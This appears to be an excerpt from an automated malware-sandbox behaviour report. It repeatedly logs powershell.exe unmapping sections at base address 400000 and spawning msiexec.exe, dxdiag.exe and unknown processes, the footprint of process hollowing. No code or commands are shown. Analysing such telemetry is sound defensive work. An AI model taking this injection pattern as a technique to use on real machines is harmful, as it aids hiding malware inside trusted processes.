Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section unmapped: C:\Windows\System32\SIHClient.exe base address: 400000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" (10 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe" (11 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" (10 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe" (6 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
